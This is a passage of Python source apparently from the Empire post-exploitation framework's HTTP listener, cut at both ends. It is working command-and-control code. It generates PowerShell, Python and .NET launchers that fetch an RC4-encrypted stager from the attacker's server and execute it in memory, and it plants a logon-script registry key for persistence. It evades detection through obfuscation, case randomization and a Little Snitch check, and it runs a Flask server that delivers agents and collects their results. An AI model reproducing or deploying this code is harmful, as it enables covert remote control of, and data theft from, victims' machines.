stager+="$filename=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"dXBkYXRlLmJhdA==\"));"
#so ugly, handle dcloud temp dir
stager+="if((get-wmiobject win32_computersystem | fl model | out-String).indexof('VMware') -ge 0){$filepath=Resolve-Path \"$env:LOCALAPPDATA\..\";}else{$filepath=$env:TEMP;};"
#stager+="New-ItemProperty -Path 'HKCU:Software\Microsoft\Windows\CurrentVersion\Run\' -Name Update -PropertyType String -Value \"$filepath\$filename\" -force|out-null;"
stager+="New-ItemProperty -Path 'HKCU:Environment\' -Name UserInitMprLogonScript -PropertyType String -Value \"$filepath\$filename\" -force|out-null;"
#cmd=base64.b64encode('''Set objShell = CreateObject("Wscript.shell"):objShell.run "powershell -wi 1 -co ""%s""",0'''% cmd)
cmd=base64.b64encode(''':On Error Resume Next\r\necho off & cls\r\nstart wscript -e:vbs "%%~f0"\r\nSet objShell = CreateObject("Wscript.shell"):objShell.run "powershell -wi 1 -co ""%s""",0'''% cmd)
stager+="[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('%s'))|out-file $filepath\$filename -Encoding ASCII;" %cmd
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket.decode('UTF-8'))
stager += helpers.randomize_capitalization(
"$data=$" + helpers.generate_random_script_var_name("wc") + ".DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print(helpers.color(p, color='red'))
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib2;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
launcherBase += "req=urllib2.Request(server+t);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (b64RoutingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib2.ProxyHandler({'" + proto + "':'" + proxy + "'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'" + proxy + "','" + username + "','" + password + "');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "o = urllib2.build_opener();\n"
# install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib2.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase)
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (
launchEncoded)
return launcher
else:
return launcherBase
if language.startswith('do'):
version=language[6:]
f = open(self.mainMenu.installPath + "./data/agent/launchers/http.cs",'r')
code = f.read()
f.close()
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
if proxy.lower() != 'none':
if proxy.lower() != 'default':
code = code.replace('wc.Proxy = WebRequest.DefaultWebProxy;', 'wc.Proxy = new WebProxy("%s");' % proxy)
else:
code = code.replace('wc.Proxy = WebRequest.DefaultWebProxy;', '')
if backupHostsSource != "":
code = code.replace('//ser=wc.DownloadString("").Trim();','ser=wc.DownloadString("%s").Trim();' % backupHostsSource)
if domainCheck != "":
code = code.replace('System.Environment.UserDomainName.Equals("")','System.Environment.UserDomainName.Equals("%s")' % domainCheck)
else:
code = code.replace('System.Environment.UserDomainName.Equals("")','true')
if proxyCreds.lower() != 'none':
if proxyCreds.lower() != "default":
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
code = code.replace('wc.Proxy.Credentials = CredentialCache.DefaultCredentials;', 'wc.Proxy.Credentials = new NetworkCredential(%s,%s,%s);' % (usr,domain,password))
else:
usr = username.split('\\')[0]
code = code.replace('wc.Proxy.Credentials = CredentialCache.DefaultCredentials;', 'wc.Proxy.Credentials = new NetworkCredential(%s,%s);' % (usr,password))
else:
code = code.replace('wc.Proxy.Credentials = CredentialCache.DefaultCredentials;', '')
routingPacket35 = packets.build_routing_packet(stagingKey, sessionID='00000000', language='DOTNET35', meta='STAGE0', additional='None', encData='')
b64RoutingPacket35 = base64.b64encode(routingPacket35)
routingPacket45 = packets.build_routing_packet(stagingKey, sessionID='00000000', language='DOTNET45', meta='STAGE0', additional='None', encData='')
b64RoutingPacket45 = base64.b64encode(routingPacket45)
code = code.replace('string u = "";', 'string u = "%s";' % userAgent)
code = code.replace('string k = "";', 'string k = "%s";' % stagingKey)
code = code.replace('string ser = Encoding.Unicode.GetString(Convert.FromBase64String(""));', 'string ser = Encoding.Unicode.GetString(Convert.FromBase64String("%s"));' % helpers.enc_powershell(host))
code = code.replace('wc.Headers.Add("Cookie", "35");', 'wc.Headers.Add("Cookie", "%s=%s");' % (cookie, b64RoutingPacket35))
code = code.replace('wc.Headers.Add("Cookie", "45");', 'wc.Headers.Add("Cookie", "%s=%s");' % (cookie, b64RoutingPacket45))
f = open(self.mainMenu.installPath + "./data/dotnet/compiler/data/Tasks/CSharp/Launcher.task",'w')
f.write(code)
f.close()
code = helpers.get_dotnet_module_assembly_with_source(self.mainMenu.installPath,'Launcher','Launcher.task',version,'1')
return code
else:
print(helpers.color(
"[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
remove = []
if customHeaders != []:
for key in customHeaders:
value = key.split(":")
if 'cookie' in value[0].lower() and value[1]:
continue
remove += value
headers = ','.join(remove)
# headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
# Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
# forces inputs into a bytestring to ensure 2/3 compatibility
stagingKey = stagingKey.encode('UTF-8')
#stager = stager.encode('UTF-8')
#randomizedStager = randomizedStager.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
# There doesn't seem to be any conditions in which the encrypt flag isn't set so the other
# if/else statements are irrelevant
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profile,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
stager = obfuscation.py_minify(stager)
# base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, stager)
else:
# otherwise return the standard stager
return stager
elif language.lower().startswith('dotnet'):
# read in the stager base
version=language[6:]
f = open("%s/data/agent/stagers/http.cs" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
#Patch in custom Headers
remove = []
if customHeaders != []:
for key in customHeaders:
value = key.split(":")
if 'cookie' in value[0].lower() and value[1]:
continue
remove += value
headers = ','.join(remove)
#headers = ','.join(customHeaders)
stager = stager.replace("string customHeaders = \"\";","string customHeaders = \""+headers+"\";")
#patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
#Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
f = open(self.mainMenu.installPath + "./data/dotnet/compiler/data/Tasks/CSharp/Stager.task",'w')
f.write(stager)
f.close()
stager = helpers.get_dotnet_module_assembly_with_source(self.mainMenu.installPath,'Stager','Stager.task',version,'2')
return base64.b64encode(stager)
else:
print(helpers.color(
"[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + b64DefaultResponse.decode('UTF-8') + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace(
'profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")',
'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse.decode("UTF-8")))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
elif language.startswith('dotnet'):
version=language[6:]
f = open(self.mainMenu.installPath + "./data/agent/agent.cs",'r')
code = f.read()
f.close()
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"')
f = open(self.mainMenu.installPath + "./data/dotnet/compiler/data/Tasks/CSharp/Agent.task",'w')
f.write(code)
f.close()
code = helpers.get_dotnet_module_assembly_with_source(self.mainMenu.installPath,'Agent','Agent.task',version,'2')
return base64.b64encode(code)
else:
print(helpers.color(
"[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add("Cookie",\"""" + self.session_cookie + """session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $""" + helpers.generate_random_script_var_name("wc") + """.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
if ($script:MissedCheckins -eq 5){
throw "error";
}
}
}
"""
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $""" + helpers.generate_random_script_var_name("wc") + """.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
print('listeners/http.py: line 851')
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets)
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff info a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket)
headers['Cookie'] = \"""" + self.session_cookie + """=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib2.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print(helpers.color(
"[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color('[!] listeners/http generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
@app.route('/download/<stager>')
def send_stager(stager):
if 'po' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
elif 'py' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
else:
return make_response(self.default_response(), 404)
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.route('/')
@app.route('/index.html')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/welcome.png')
def serve_index_helper():
"""
Serves image loaded by index page.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can be easily moved to a paramter, another cookie value, etc.
if self.session_cookie in cookie:
listenerName = self.options['Name']['Value']
message = "[*] GET cookie value from {} : {}".format(clientIP, cookie)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith(self.session_cookie):
base64RoutingPacket = part[part.find('=') + 1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if isinstance(results, str):
results = results.encode('UTF-8')
if results == b'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
if b'not in cache' in results:
# signal the client to restage
print(helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
listenerName = self.options['Name']['Value']
message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
hopListenerName = request.headers.get('Hop-Name')
try:
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
elif results.startswith(b'VALID'):
listenerName = self.options['Name']['Value']
message = "[*] Valid results returned by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
pyversion = sys.version_info
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
